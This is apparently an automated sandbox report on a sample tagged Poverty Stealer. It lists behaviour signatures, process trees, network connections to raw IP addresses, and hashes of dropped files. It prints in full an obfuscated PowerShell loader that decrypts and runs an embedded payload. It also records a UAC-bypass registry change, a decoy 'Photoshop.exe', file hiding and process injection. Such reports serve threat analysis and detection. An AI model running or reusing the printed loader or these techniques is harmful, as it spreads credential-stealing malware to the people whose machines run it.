Malware Analysis Report

2024-10-23 17:19

Sample ID 240305-cfqkkaca57
Target 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.unknown
SHA256 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f
Tags
povertystealer evasion stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f

Threat Level: Known bad

The file 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.unknown was found to be: Known bad.

Malicious Activity Summary

povertystealer evasion stealer trojan

Detect Poverty Stealer Payload

Poverty Stealer

UAC bypass

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-05 02:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-05 02:01

Reported

2024-03-05 02:04

Platform

win7-20240221-en

Max time kernel

118s

Max time network

122s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

N/A

Files

memory/2156-2-0x0000000074410000-0x00000000749BB000-memory.dmp

memory/2156-3-0x0000000074410000-0x00000000749BB000-memory.dmp

memory/2156-4-0x0000000002560000-0x00000000025A0000-memory.dmp

memory/2156-5-0x0000000002560000-0x00000000025A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c3e011120b6ad889373fb7fd8636d767
SHA1 452e693b2bb223ee6afda9cb2266f8f02e0135e7
SHA256 ad5164bd9309f63da8508380cf58e1f128d8786b78aac0c0fa25a5cd1b7192f9
SHA512 0edf1d610e9016b0e0c0bcce6ec2a8f74dec5fa9848b6bc61c05cf4f29df2ce6269e8667f4103cc0633a842589d5b49befe55270608b7f816e1f3f4c3dc0663b

memory/2612-11-0x0000000074410000-0x00000000749BB000-memory.dmp

memory/2612-12-0x0000000002600000-0x0000000002640000-memory.dmp

memory/2612-13-0x0000000074410000-0x00000000749BB000-memory.dmp

memory/2612-14-0x0000000074410000-0x00000000749BB000-memory.dmp

memory/2156-15-0x0000000074410000-0x00000000749BB000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-05 02:01

Reported

2024-03-05 02:04

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

156s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect Poverty Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Poverty Stealer

stealer povertystealer

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Photoshop.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2336 set thread context of 4856 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1880 wrote to memory of 4656 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4656 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4656 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 3120 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 3120 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 3120 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3120 wrote to memory of 2040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 3120 wrote to memory of 2040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 3120 wrote to memory of 2040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 2040 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Roaming\Photoshop.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Roaming\Photoshop.exe C:\Windows\system32\cmd.exe
PID 2656 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2656 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2656 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 4056 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 4056 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 4084 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 4084 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2656 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2656 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2656 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 2656 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 2656 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 2336 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2336 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2336 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2336 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2336 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop.exe

"C:\Users\Admin\AppData\Roaming\Photoshop.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p125762329330388294023250819845 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "nmYIeCI7gcMH.exe"

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

"nmYIeCI7gcMH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
NL 91.92.251.35:80 91.92.251.35 tcp
US 8.8.8.8:53 35.251.92.91.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 joxi.net udp
US 104.21.73.118:80 joxi.net tcp
US 104.21.73.118:443 joxi.net tcp
US 8.8.8.8:53 118.73.21.104.in-addr.arpa udp
DE 146.70.169.164:2227 tcp
US 8.8.8.8:53 164.169.70.146.in-addr.arpa udp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp

Files

memory/4656-2-0x0000000004CA0000-0x0000000004CD6000-memory.dmp

memory/4656-3-0x0000000074880000-0x0000000075030000-memory.dmp

memory/4656-4-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

memory/4656-5-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

memory/4656-6-0x0000000005410000-0x0000000005A38000-memory.dmp

memory/4656-7-0x00000000052B0000-0x00000000052D2000-memory.dmp

memory/4656-8-0x0000000005AB0000-0x0000000005B16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbqmm3vr.5n4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4656-9-0x0000000005B20000-0x0000000005B86000-memory.dmp

memory/4656-19-0x0000000005C90000-0x0000000005FE4000-memory.dmp

memory/4656-20-0x0000000006160000-0x000000000617E000-memory.dmp

memory/4656-21-0x0000000006200000-0x000000000624C000-memory.dmp

memory/4656-22-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

memory/4656-23-0x0000000007A80000-0x00000000080FA000-memory.dmp

memory/4656-24-0x0000000007210000-0x000000000722A000-memory.dmp

memory/3120-25-0x0000000074880000-0x0000000075030000-memory.dmp

memory/3120-36-0x0000000002600000-0x0000000002610000-memory.dmp

memory/3120-26-0x0000000002600000-0x0000000002610000-memory.dmp

memory/3120-37-0x0000000006220000-0x0000000006264000-memory.dmp

memory/3120-38-0x0000000006F90000-0x0000000007006000-memory.dmp

memory/3120-39-0x0000000002600000-0x0000000002610000-memory.dmp

memory/3120-40-0x00000000071B0000-0x0000000007246000-memory.dmp

memory/3120-41-0x0000000007160000-0x0000000007182000-memory.dmp

memory/3120-42-0x00000000082C0000-0x0000000008864000-memory.dmp

memory/3120-43-0x000000007F810000-0x000000007F820000-memory.dmp

memory/3120-44-0x0000000007380000-0x00000000073B2000-memory.dmp

memory/3120-45-0x0000000070DC0000-0x0000000070E0C000-memory.dmp

memory/3120-55-0x0000000007360000-0x000000000737E000-memory.dmp

memory/3120-56-0x00000000073C0000-0x0000000007463000-memory.dmp

memory/3120-57-0x00000000074C0000-0x00000000074CA000-memory.dmp

memory/3120-58-0x00000000074D0000-0x00000000074E1000-memory.dmp

memory/3120-59-0x0000000007500000-0x000000000750E000-memory.dmp

memory/3120-60-0x0000000007520000-0x0000000007534000-memory.dmp

memory/3120-61-0x0000000007560000-0x000000000757A000-memory.dmp

memory/3120-62-0x0000000007550000-0x0000000007558000-memory.dmp

memory/4656-63-0x0000000074880000-0x0000000075030000-memory.dmp

memory/4656-65-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4656-68-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

memory/3120-69-0x0000000074880000-0x0000000075030000-memory.dmp

memory/3120-70-0x0000000002600000-0x0000000002610000-memory.dmp

memory/3120-71-0x0000000002600000-0x0000000002610000-memory.dmp

memory/3120-72-0x0000000002600000-0x0000000002610000-memory.dmp

memory/3120-73-0x000000007F810000-0x000000007F820000-memory.dmp

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 a8048bd6fc7d336d7f6e0fd6800da673
SHA1 f28db14f2884ac1db0ce53a7ec7bee572541d902
SHA256 d7414d6e34052bd4194ebf979a405af4e0d39b42b6d4d6ad31db85fd78dcc31d
SHA512 570d1ac52dcb8f6c67983a4af99fece9f47e03beba83b9b2c95ce544f5b5f40c8c7e46019f5e106b258de2affee91988053dbab9e777e1c115d3803513eea066

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 4fd52f2655010a63deae8d3d492f6bda
SHA1 99b1ccc13b1561e93784d860d03329cfd746f6e5
SHA256 d4a0f3946c6a6204230f05b41b5c403f1c4678afb3968a1916e45a5d5f277443
SHA512 85f205ed13bb8dead4df2eb9ce8603142d9ffc0d6758f79fbbd26172a95e466072e2298848647da1ca478328632108624b766f235b3f9d5c90274e72e22d0344

memory/3120-87-0x0000000074880000-0x0000000075030000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1a9f0871e2603addb86af5e7eb66f1d4
SHA1 fe3ff665c4f6de7b189edcf95f7dc0b65a2f21ca
SHA256 246c0061674e59b29627989240600f398843059a01ae86291a21b5a798378a7f
SHA512 eddda8a5160190c2388c565b91cd9fa002e174a67810ea8a9414e6a8f72829787ff5eeaaf1026f6a4a255156ad6e755f815a16db2de61ba8e59efe0aa66cafae

memory/4656-90-0x0000000074880000-0x0000000075030000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 12b875e85a885c81bc04161e9df9151a
SHA1 7d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA256 97e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
SHA512 3ba38a4024287bcaeee208a1c0158fae73a86d5581cf566309985bbd204e810eb5fd099a1816a9326c9e25bb08a2da20f2a4884978eb4e4ed8a3762c1057d0ca

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 afaebf70e6daf7bf2e07cd11f93ee4a1
SHA1 4e8b08b3e50f860955bd00d16fc1653c07b7c608
SHA256 4a9d76fb9d77efaf81616e750b928ba3955599acafb2c0fec0d7ce412db0f47b
SHA512 4db3a63f03f8816b85fdb905e2a2f08967f9f3735206f08f2cae8b8cd561e8563d2f92c188d32b94fdb6d472e07c5f41f54e26673f8a81449454225220ba397f

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
